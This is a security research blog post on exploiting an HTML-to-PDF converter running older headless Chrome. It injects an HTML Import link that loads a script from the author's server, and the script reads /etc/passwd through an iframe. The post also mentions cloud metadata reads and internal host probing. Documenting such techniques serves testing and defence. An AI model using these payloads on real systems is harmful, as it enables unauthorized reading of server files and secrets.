You’ve probably already heard about many different ways to exploit HTML-to-PDF converters and access sensitive info: you can try to
169.254.169.254 IP and read that sweet, sweet metadata. Didn’t work? Inject a
<link> with a
rel="attachment" property and attach a sensitive file to the PDF. No? At least use an
<img> to send GET requests to internal hosts or fingerprint them using their favicons?
Recently, I ran into a scenario where all of these HTML tags were correctly filtered, and none of the methods/bypasses/encodings I tried seemed to work.
How the App Worked
The feature I was testing was some kind of contact form. You could customize the look and feel of your form using a rich text editor and when your form gets a response, you can download it as a PDF. After looking at the app a bit more in-depth, I noticed a few things:
- The text editor uses HTML to format text, embed images, etc. But there is a whitelist allowing only a few innocuous HTML tags.
<img>is one of the allowed tags, so I used it to send a request to my collaborator server and fingerprint the converter based on the
User-Agentheader. It was headless Chrome.
- You can attach arbitrary properties to whitelisted HTML tags as long as the properties aren’t JS event handlers, i.e. starting with “on” like
<img onload>isn’t allowed, but
- One of the allowed HTML tags is
<link>which is used for styling purposes.
I set up an HTTP server and used HTTPLeaks to determine if any of the allowed HTML tags could be used to do anything interesting. One of the few vectors that triggered an HTTP request was
<link rel="import" href="https://leaking.via/link-import"/>, aka HTML Imports.
HTML Imports 101
HTML imports can be defined using the following syntax
<link rel="import" href="/import.html">
It’s important to note that as of 2021, the HTML imports feature has been deprecated and removed from Chrome, so this technique only works on Chrome versions before 80.
You’ve probably guessed where this is going. The most straightforward way to exploit an HTML-to-PDF converter is using an
<iframe>, and if it’s filtered, we can use a
The payload looked like this
<link rel="import" href="http://[my_server]/import.html">
And on my server, I enabled CORS hosted a payload that created an
<iframe> with the content of
<script> var iframe = document.createElement('iframe'); iframe.height = 1000 iframe.width = 1000 iframe.src="file:///etc/passwd"; document.body.appendChild(iframe) </script>
documenthere references the main document that’s importing the file. To access the the import document itself, you can use
To test this locally, you can install Chrome v80>= and use this command to generate a PDF
google-chrome-stable --headless --print-to-pdf import.html
It’s useful to read RFCs and research the technologies that you’re trying to break. Usually, you will find interesting behavior that may help you find more exploits and bypasses. Although the HTML Imports feature has been deprecated in newer versions of Chrome, it might come in handy; the older versions are still used in the wild.